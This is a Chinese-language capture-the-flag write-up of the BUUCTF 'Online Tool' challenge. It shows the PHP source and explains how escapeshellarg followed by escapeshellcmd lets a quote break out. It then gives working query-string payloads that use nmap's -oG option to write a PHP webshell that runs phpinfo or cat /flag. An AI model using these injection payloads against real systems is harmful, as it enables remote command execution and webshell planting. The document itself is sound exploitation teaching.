buuctf-[BUUCTF 2018]Online Tool(小宇特详解)
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
这里的escapeshellarg作用是:1,确保用户值传递一个参数给命令2,用户不能指定更多的参数3,用户不能执行不同的命令
escapeshellcmd的作用是:1,确保用户只执行一个命令2,用户可以指定不限数量的参数3,用户不能执行不同的命令
我们通过get方式进行对host的传参
这里需要我们构造能够得到flag的host语句
这里查看RCE漏洞的原理
用我的话来说
escapeshellarg处理后先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
127.0.0.1’ -oG经过 escapeshellarg处理后就变成了'127.0.0.1'\'' -oG '
也就是发现单引号进行转义,且以它为中心分割为三部分(在两边加单引号) 。
随后在进经过escapeshellcmd 时变成:'127.0.0.1'\\'' -oG \'
也就是将不成对的单引号及任意\
进行添加\
的操作。
而此时我们想得到shell需要写入一个shell文件我们想要正常执行<?php phpinfo(); ?> -oG 1.php
但是经过上面的函数处理后变成了一个被单引号包围的字符串,不会当命令去执行,这里我们需要闭合一个单引号。
nmap有一个参数-oG可以实现将命令和结果写到文件
所以我们可以控制自己的输入写入文件,这里我们可以写入一句话木马链接,也可以直接命令 cat flag
查看phpinfo()
?host=' <?php echo phpinfo();?> -oG 1.php '
查看flag
?host=' <?php echo `cat /flag`;?> -oG test.php '
这里注意用反引号cat /flag